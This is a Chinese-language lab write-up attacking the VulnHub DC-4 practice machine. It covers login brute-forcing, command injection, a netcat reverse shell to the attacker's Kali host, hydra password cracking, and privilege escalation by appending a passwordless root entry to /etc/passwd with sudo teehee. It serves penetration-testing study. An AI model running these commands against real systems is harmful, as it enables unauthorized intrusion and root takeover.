vlunhub-dc4打靶

环境

vulnhub项目 https://www.vulnhub.com/entry/dc-4,313/
靶机:172.16.17.145
攻击机kali:172.16.17.140

描述

信息收集

对靶机进行nmap扫描

开放22和80端口

打开网站首页是一个登录框

扫描目录,没什么收获

回到登录,没有验证码也没有token,尝试爆破

Exploit

命令执行

登录看到,command敏感字,继续跟进

明显的命令执行,抓包分析

成功执行命令

反弹shell

反弹一个shell到kali看看 ,nc监听本地4444端口

反弹成功

1
nc -e /bin/sh 172.16.17.140 4444

利用python反弹一个交互式shell

1
python3 -c 'import pty; pty.spawn("/bin/bash")'

提权

翻翻目录,在家目录翻到一些文件,发现疑似密码

复制出来构造账号为家目录的几个文件夹名,密码为passwords.bak文件里的

用hydra爆破出账号密码 jim/jibril04

登录,一顿翻发现有邮件

在/var/spool/mail下翻到邮件,找到Charles的密码

尝试登录,发现没有这个用户

切换一下小写成功登录,查看一下sudo 运行的命令有一个teehee

使用teehee命令提权

1
/usr/share/nginx/html$ echo "ceshi::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

提权到 root

找到flag